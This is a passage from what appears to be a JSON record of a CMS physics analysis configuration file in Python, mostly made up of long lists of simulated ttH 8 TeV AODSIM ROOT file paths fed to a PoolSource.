,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/D49F4B34-C70B-E211-99F4-0025B3E06400.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/D2C6963C-C70B-E211-9D24-002590200908.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/D26CAF3C-C70B-E211-A812-002590200930.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/D026AE93-B90B-E211-9E76-002481E14D76.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/CCD8F139-C70B-E211-B2E8-003048D47A4C.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/CA85ABB8-D90B-E211-A2BB-001E67397E13.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/CA63512E-C70B-E211-8DDF-001E672CC1E7.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/C480E406-A90B-E211-8B58-001E67397D00.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/C0D5E949-9C0B-E211-A208-001E673967C5.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/C0D100AE-D90B-E211-8962-001E67396DBA.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/BCF27C36-C70B-E211-876B-002590200A6C.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/B4E711BB-D90B-E211-A42C-001E67396E3C.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/B2A005DE-D90B-E211-94B3-001E67397D91.root'\n ,\n 
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/AC3D508B-B90B-E211-AB8D-003048D45F2C.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/AAC74E91-B90B-E211-A9FF-002590200A98.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/AAAE1D0A-A90B-E211-907D-001E67398CB9.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/A89EA633-C70B-E211-AF12-0025902009A4.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/A836D251-C70B-E211-BFDD-0025902008E4.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/A448E095-E90B-E211-8CED-001E673969D2.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/9EBE5A69-C70B-E211-A36E-001E67398E12.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/9C84FAB1-D90B-E211-8EDF-001E67396874.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/9AFA54C5-D90B-E211-9C13-001E67396568.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/9A4A0F32-C70B-E211-A372-002590200898.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/94BE773D-C70B-E211-836F-001E67398CE1.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/944B6544-B90B-E211-920A-002481E1511E.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/90CBB57E-E90B-E211-AB2F-0025902009C0.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/8E16A8F3-D90B-E211-83D6-002590200B0C.root'\n 
,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/8ACD8F9C-B90B-E211-8F86-002590200B4C.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/8ABCBFC1-D90B-E211-9C77-002590200B68.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/8AAE9A07-A90B-E211-ABCF-001E673967C5.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/8A5DE24C-C70B-E211-9271-002590200988.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/88CA0942-C70B-E211-A894-0025B31E3CC0.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/7EFFEF3A-C70B-E211-A78B-001E67396A63.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/7CDD1A9C-B90B-E211-99CE-003048D45FD8.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/7A951BB1-D90B-E211-B97A-003048D476B4.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/78C1620C-A90B-E211-AF89-001E67396761.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/748AA33D-C70B-E211-AA21-001E67398390.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/74013EE7-D90B-E211-B929-001E673970C1.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/726A8A0A-A90B-E211-86C8-001E67397094.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/70698A49-C70B-E211-BE12-002590200A28.root'\n ,\n 
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/6E05B863-C70B-E211-B476-002590200938.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/6E03CAFF-D90B-E211-96B9-001E67396C52.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/6CB7A769-C70B-E211-A569-002590200A80.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/6C3E469D-B90B-E211-93ED-003048D45FE8.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/68D8E30B-A90B-E211-9884-003048673F24.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/6644544A-C70B-E211-B9D8-001E67398E49.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/60FAAC62-9C0B-E211-B091-002590200B00.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/5E932B7F-F60B-E211-A37C-001E67398C05.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/5E2DFB9D-B90B-E211-8767-0025B31E3C3C.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/5C9369BA-D90B-E211-AB39-001E67397396.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/5485BB36-C70B-E211-A62A-002590200A98.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/54439593-B90B-E211-AF3D-001E67398011.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/540D144A-9C0B-E211-BE2D-001E67396C9D.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/5087B43E-B90B-E211-834E-003048D45FB6.root'\n 
,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/50119B4C-C70B-E211-BC7A-00259020083C.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/4EBF2B87-B90B-E211-8020-003048D476C4.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/4E90C544-B90B-E211-92CF-001E67396DCE.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/4E42EA41-C70B-E211-89E7-002590200900.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/4E24ECEB-D90B-E211-B732-001E67397CCE.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/4A3C00E2-D90B-E211-81B6-0025902009B0.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/487FA490-B90B-E211-B401-003048D45FE8.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/46C80D32-C70B-E211-ADC0-003048D45F98.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/4680304C-B90B-E211-9E05-003048D479F2.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/4442750C-A90B-E211-982C-001E67396644.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/428A4E96-B90B-E211-8098-002590200B74.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/4048B9E0-D90B-E211-AD88-001E67397B07.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/3ECD1D4C-B90B-E211-BCE7-003048D46034.root'\n ,\n 
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/3EA42648-9C0B-E211-96A1-001E673972F6.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/3E5C2DB5-D90B-E211-AFAA-9C8E991A143E.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/3C91E824-A90B-E211-A981-001E67397D00.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/3AF523B1-D90B-E211-A075-001E67396BB7.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/3A3BB131-C70B-E211-AE83-001E67396DB5.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/3642D7AF-D90B-E211-A79C-0030486740BA.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/30A91F44-9C0B-E211-ABA7-001E6739811A.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/30897650-C70B-E211-9F69-0025902008D8.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/304AEF43-C70B-E211-8856-003048D45F98.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/2E24DE3A-B90B-E211-ACC7-0025B3E06556.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/2CE679E6-D90B-E211-B835-002590200B0C.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/2C7439E9-D90B-E211-8919-002590200930.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/2AFB4848-B90B-E211-A519-001E673965FE.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/2A854B08-A90B-E211-9851-001E67397701.root'\n 
,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/2817039C-B90B-E211-9F8D-0025B31E3C58.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/241AF10A-A90B-E211-BB12-001E67397CCE.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/240A3B43-B90B-E211-BA5F-002481E14FFC.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/20986287-B90B-E211-942A-003048D47A4C.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/1EB30D07-DA0B-E211-BE8F-001E67398E62.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/1E2DEC38-B90B-E211-B323-003048D476C2.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/1C490588-B90B-E211-99B7-003048D45FAE.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/0E69E144-B90B-E211-AFD2-0025B3E05DB6.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/0CF5EAB8-D90B-E211-AD4B-002590200AD0.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/0CBE6239-B90B-E211-8155-001E67396A18.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/08A93150-9C0B-E211-9BF5-001E67396EAA.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/0639D68C-B90B-E211-953D-003048D4609E.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/060DDA6A-C70B-E211-BF0C-001E67396D4C.root'\n ,\n 
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/02C8D108-DA0B-E211-8141-001E67397396.root'\n ,\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/0078C0C1-D90B-E211-83A4-001E67396E32.root'\n ])\nsecFiles.extend([])\n",
"step-5": "import FWCore.ParameterSet.Config as cms\n\nmaxEvents = cms.untracked.PSet( input = cms.untracked.int32(-1) )\nreadFiles = cms.untracked.vstring()\nsecFiles = cms.untracked.vstring() \nsource = cms.Source (\"PoolSource\",fileNames = readFiles, secondaryFileNames = secFiles)\nreadFiles.extend( [\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/FE26AAB2-D90B-E211-AD0F-0025902009B8.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/FCB6A333-C70B-E211-8C99-001E67396D51.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/FA9CB2B5-D90B-E211-82B1-001E67397B07.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/F8F81697-E90B-E211-9A48-002590200834.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/F88B7838-C70B-E211-8971-001E673968F1.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/F6481280-E90B-E211-8349-002590200B34.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/F4DAB680-B90B-E211-BE7E-003048D47A6C.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/F2F3F436-C70B-E211-A3A4-002481E1511E.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/F03693B3-D90B-E211-8CFB-001E67398633.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/EEF20E3B-C70B-E211-953A-002590200970.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/EEA69380-E90B-E211-833A-002590200970.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/EE92E708-A90B-E211-BE6A-001E67397B07.root',\n 
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/EC8A6530-C70B-E211-9D59-002590200840.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/EAE34E85-B90B-E211-B5AD-003048673F3A.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/EACF738F-E90B-E211-8D44-00259020081C.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/E43E9F40-C70B-E211-8CFE-001E67396644.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/DEF585B4-D90B-E211-AD4B-002590200B38.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/DE991237-C70B-E211-A065-001E67397003.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/DE69B13F-B90B-E211-A320-002481E1511E.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/DCDE4B42-C70B-E211-9F88-003048D4602A.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/DC7EDE05-A90B-E211-B465-0025902008F4.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/DAFF741D-A90B-E211-B24E-001E673969D2.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/D865D241-B90B-E211-A391-003048673F26.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/D6C4A74C-C70B-E211-B449-003048D45F78.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/D4EB5C31-C70B-E211-AC1B-002590200AD0.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/D49F4B34-C70B-E211-99F4-0025B3E06400.root',\n 
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/D2C6963C-C70B-E211-9D24-002590200908.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/D26CAF3C-C70B-E211-A812-002590200930.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/D026AE93-B90B-E211-9E76-002481E14D76.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/CCD8F139-C70B-E211-B2E8-003048D47A4C.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/CA85ABB8-D90B-E211-A2BB-001E67397E13.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/CA63512E-C70B-E211-8DDF-001E672CC1E7.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/C480E406-A90B-E211-8B58-001E67397D00.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/C0D5E949-9C0B-E211-A208-001E673967C5.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/C0D100AE-D90B-E211-8962-001E67396DBA.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/BCF27C36-C70B-E211-876B-002590200A6C.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/B4E711BB-D90B-E211-A42C-001E67396E3C.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/B2A005DE-D90B-E211-94B3-001E67397D91.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/AC3D508B-B90B-E211-AB8D-003048D45F2C.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/AAC74E91-B90B-E211-A9FF-002590200A98.root',\n 
'/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/AAAE1D0A-A90B-E211-907D-001E67398CB9.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/A89EA633-C70B-E211-AF12-0025902009A4.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/A836D251-C70B-E211-BFDD-0025902008E4.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/A448E095-E90B-E211-8CED-001E673969D2.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/9EBE5A69-C70B-E211-A36E-001E67398E12.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/9C84FAB1-D90B-E211-8EDF-001E67396874.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/9AFA54C5-D90B-E211-9C13-001E67396568.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/9A4A0F32-C70B-E211-A372-002590200898.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/94BE773D-C70B-E211-836F-001E67398CE1.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/944B6544-B90B-E211-920A-002481E1511E.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/90CBB57E-E90B-E211-AB2F-0025902009C0.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/8E16A8F3-D90B-E211-83D6-002590200B0C.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/8ACD8F9C-B90B-E211-8F86-002590200B4C.root',\n '/store/mc/Summer12_DR53X/TTH_Inclusive_M-115_8TeV_pythia6/AODSIM/PU_S10_START53_V7A-v1/00000/8ABCBFC1-D90B-E211-9C77-002590200B68.root',\n 
